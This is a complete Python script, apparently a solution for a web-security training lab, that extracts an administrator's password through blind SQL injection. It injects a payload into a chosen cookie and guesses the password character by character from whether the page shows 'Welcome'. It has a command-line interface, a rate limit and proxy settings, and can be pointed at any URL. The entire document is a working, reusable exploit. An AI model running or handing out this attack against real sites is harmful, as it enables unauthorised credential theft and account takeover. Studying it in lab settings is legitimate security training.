import sys
import requests
import urllib3
import urllib.parse
import time
from typing import Optional, Dict

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}


def get_initial_cookies(url: str) -> tuple[Dict[str, str], str]:
    """
    Makes an initial request to the URL to retrieve default cookies.
    """
    print("(i) Fetching cookies from the target...")
    response = requests.get(url, verify=False, proxies=proxies)
    cookies = requests.utils.dict_from_cookiejar(response.cookies)

    if not cookies:
        print("[-] No cookies were returned from the server.")
        sys.exit(1)

    print("(i) Cookies retrieved from server:")
    for key, value in cookies.items():
        print(f"    {key} = {value}")

    while True:
        injection_cookie = input(
            "\n(?) Enter the cookie name to inject SQL payload into: "
        ).strip()
        if injection_cookie in cookies:
            return cookies, injection_cookie
        else:
            print("[-] Cookie not found. Please choose one from the list above.")


def sqli_password(
    url: str,
    cookies: Optional[Dict[str, str]] = None,
    rate_limit: Optional[int] = None,
    password_length: int = 23,
    injection_cookie: Optional[str] = None,
) -> str:
    password_extracted = ""

    if cookies is None or injection_cookie is None:
        cookies, injection_cookie = get_initial_cookies(url)

    assert cookies is not None  # for static type checkers

    for i in range(1, password_length + 1):
        for j in range(32, 126):
            sqli_payload = (
                "' and (select ascii(substring(password,%s,1)) from users where username='administrator')='%s'--"
                % (i, j)
            )
            sqli_payload_encoded = urllib.parse.quote(sqli_payload)

            test_cookies = cookies.copy()
            test_cookies[injection_cookie] += sqli_payload_encoded

            response = requests.get(
                url, cookies=test_cookies, verify=False, proxies=proxies
            )

            if "Welcome" not in response.text:
                sys.stdout.write("\r" + password_extracted + chr(j))
                sys.stdout.flush()
            else:
                password_extracted += chr(j)
                sys.stdout.write("\r" + password_extracted)
                sys.stdout.flush()
                break

            if rate_limit:
                time.sleep(1 / rate_limit)

    return password_extracted


def main():
    import argparse

    parser = argparse.ArgumentParser(description="SQL Injection Password Extractor")
    parser.add_argument("url", help="The target URL")
    parser.add_argument(
        "--cookies",
        type=str,
        help="Cookies for the request in key=value format",
        nargs="*",
    )
    parser.add_argument(
        "--rate",
        type=int,
        help="Request rate limit (requests per second)",
        default=None,
    )
    parser.add_argument(
        "--length", type=int, help="Length of the password to extract", default=23
    )
    parser.add_argument(
        "--inject", type=str, help="Cookie name to inject SQL payload into"
    )

    args = parser.parse_args()

    cookies_dict = None
    if args.cookies:
        cookies_dict = dict(cookie.split("=") for cookie in args.cookies)

    try:
        print("(+) Retrieving administrator password...")
        password = sqli_password(
            args.url,
            cookies=cookies_dict,
            rate_limit=args.rate,
            password_length=args.length,
            injection_cookie=args.inject,
        )
        print(f"\n(+) Administrator password: {password}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")
        sys.exit(1)


if __name__ == "__main__":
    main()